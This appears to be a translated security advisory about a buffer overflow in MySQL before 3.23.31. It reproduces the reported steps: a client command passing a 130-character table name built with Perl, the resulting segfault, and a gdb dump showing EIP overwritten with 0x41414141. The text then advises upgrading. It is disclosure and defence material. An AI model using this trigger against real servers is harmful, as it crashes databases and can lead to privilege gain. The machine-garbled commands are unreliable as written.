Security vulnerabilities for previous versions of MySQL3.23.31

mysql| Security | Security vulnerabilities all versions of MySQL less than 3.23.31 have a buffer overflow vulnerability that causes MySQL to crash. Allows attackers to gain mysqld privileges, and can manipulate all databases. The premise of the attack is that you must have a valid login name and password.



The following is a summary of the letters originally published in the MySQL mailing list.

==================================================


The vulnerability was discovered by Jo?o Gouveia on January 12:

Steps:


To start MySQL on the first terminal:


Spike:/var/mysql #/sbin/init.d/mysql Start


On a different terminal, enter:

jroberto@spike:~ > Mysql-p-E ' select a. ' Perl-e ' printf ("a" x130) '. B '

Enter Password:

(no response?) Press ^c to exit)


On the first terminal it will display:


Spike:/var/mysql #/usr/bin/safe_mysqld:line 149:15557 Segmentation fault

Nohup

$ledir/mysqld--basedir= $MY _basedir_version--datadir= $DATADIR--skip-lockin

G "$@" >> $err _log 2>&1>

Number of processes running now:0

Mysqld restarted on Fri 07:10:54 WET 2001

Mysqld Daemon Ended


Use GDB to display the results as follows:


(GDB) Run

Starting program:/USR/SBIN/MYSQLD

[New thread 16897 (Manager thread)]

[New thread 16891 (initial thread)]

[New Thread 16898]

/usr/sbin/mysqld:ready for connections

[New Thread 16916]

[Switching to Thread 16916]


Program received signal SIGSEGV, segmentation fault.

0x41414141 in?? ()

(GDB) Info all-registers

EAX 0x1 1

ECX 0x68 104

EdX 0x8166947 135686471

EBX 0x41414141 1094795585

ESP 0xbf5ff408 0xbf5ff408

EBP 0x41414141 0x41414141

ESI 0x41414141 1094795585

EDI 0x0 0

EIP 0x41414141 0x41414141

EFlags 0x10246 66118

CS 0x23 35

SS 0X2B 43

DS 0x2b 43

Es 0x2b 43

FS 0x0 0

GS 0x0 0


One of the EIP instructions is the buffer overflow.


The solution is to upgrade to 3.23.31. So, if you have not upgraded the database to the latest version, please act quickly.